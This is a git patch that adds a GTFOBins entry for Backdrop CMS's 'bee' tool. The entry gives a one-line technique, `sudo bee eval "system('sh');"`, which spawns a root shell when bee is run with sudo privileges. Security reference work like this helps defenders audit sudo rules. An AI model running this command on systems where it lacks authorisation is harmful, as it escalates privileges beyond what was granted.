From 1d82e3aa2ea3ad3a9a77f652f945c91f42062da2 Mon Sep 17 00:00:00 2001 From: terp <190659213+t3rp@users.noreply.github.com> Date: Fri, 18 Apr 2025 14:56:51 +0000 Subject: [PATCH] Added bee suid function to GTFObins --- _gtfobins/bee.md | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 _gtfobins/bee.md diff --git a/_gtfobins/bee.md b/_gtfobins/bee.md new file mode 100644 index 00000000..f7a84e52 --- /dev/null +++ b/_gtfobins/bee.md @@ -0,0 +1,7 @@ +--- +functions: + sudo: + - description: For this to work [`bee`](/gtfobins/bee/) must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`). + code: | + sudo bee eval "system('sh');" +---